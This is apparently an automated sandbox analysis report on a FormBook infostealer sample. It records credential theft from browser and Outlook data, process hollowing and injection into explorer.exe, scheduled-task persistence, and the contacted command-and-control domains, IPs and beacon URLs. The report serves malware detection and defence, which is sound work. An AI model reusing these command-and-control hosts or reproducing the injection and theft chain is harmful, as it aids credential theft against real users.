Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.919281681.0000000000E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.918719322.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.733501638.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.727145278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.919250262.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.MOe7vYpWXW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MOe7vYpWXW.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.919281681.0000000000E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.918719322.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.733501638.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.727145278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.919250262.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.MOe7vYpWXW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MOe7vYpWXW.exe.400000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 404125 Sample: MOe7vYpWXW.exe Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 51 www.mvcsecrets.com 2->51 53 mvcsecrets.com 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 9 other signatures 2->69 11 MOe7vYpWXW.exe 7 2->11         started        signatures3 process4 file5 39 C:\Users\user\AppData\...\fendlKCsOIoiN.exe, PE32 11->39 dropped 41 C:\...\fendlKCsOIoiN.exe:Zone.Identifier, ASCII 11->41 dropped 43 C:\Users\user\AppData\Local\...\tmpC79C.tmp, XML 11->43 dropped 45 C:\Users\user\AppData\...\MOe7vYpWXW.exe.log, ASCII 11->45 dropped 73 Uses schtasks.exe or at.exe to add and modify task schedules 11->73 75 Tries to detect virtualization through RDTSC time measurements 11->75 77 Injects a PE file into a foreign processes 11->77 15 MOe7vYpWXW.exe 11->15         started        18 schtasks.exe 1 11->18         started        20 MOe7vYpWXW.exe 11->20         started        signatures6 process7 signatures8 87 Modifies the context of a thread in another process (thread injection) 15->87 89 Maps a DLL or memory area into another process 15->89 91 Sample uses process hollowing technique 15->91 93 Queues an APC in another process (thread injection) 15->93 22 explorer.exe 15->22 injected 26 conhost.exe 18->26         started        process9 dnsIp10 55 www.reinboge.net 98.124.204.16, 49766, 49767, 49768 ENOMAS1US United States 22->55 57 shops.myshopify.com 23.227.38.74, 49771, 49772, 49773 CLOUDFLARENETUS Canada 22->57 59 2 other IPs or domains 22->59 71 System process connects to network (likely due to code injection or exploit) 22->71 28 systray.exe 18 22->28         started        32 autochk.exe 22->32         started        signatures11 process12 file13 47 C:\Users\user\AppData\...\2N3logrv.ini, data 28->47 dropped 49 C:\Users\user\AppData\...\2N3logri.ini, data 28->49 dropped 79 Detected FormBook malware 28->79 81 Tries to steal Mail credentials (via file access) 28->81 83 Tries to harvest and steal browser information (history, passwords, etc) 28->83 85 3 other signatures 28->85 34 cmd.exe 2 28->34         started        signatures14 process15 signatures16 61 Tries to harvest and steal browser information (history, passwords, etc) 34->61 37 conhost.exe 34->37         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
98.124.204.16
 www.reinboge.net United States
21740 ENOMAS1US true
23.227.38.74
 shops.myshopify.com Canada
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
mvcsecrets.com 34.102.136.180 true
www.reinboge.net 98.124.204.16 true
shops.myshopify.com 23.227.38.74 true
www.riandmoara.com unknown unknown
www.priminerw.com unknown unknown
www.mvcsecrets.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.riandmoara.com/op9s/ true
  • Avira URL Cloud: safe
 unknown
http://www.riandmoara.com/op9s/?ATRlddL=xnspkmSPLBj08xNePaHPPsjxz908h8zfhpai7QtikNAo4s21U/7o4eKTODKz+4ENdtw2&vjlP0v=UDHHm2vhQ0rxBNh true
  • Avira URL Cloud: safe
 unknown
http://www.reinboge.net/op9s/ true
  • Avira URL Cloud: safe
 unknown
www.mvcsecrets.com/op9s/ true
  • Avira URL Cloud: safe
 low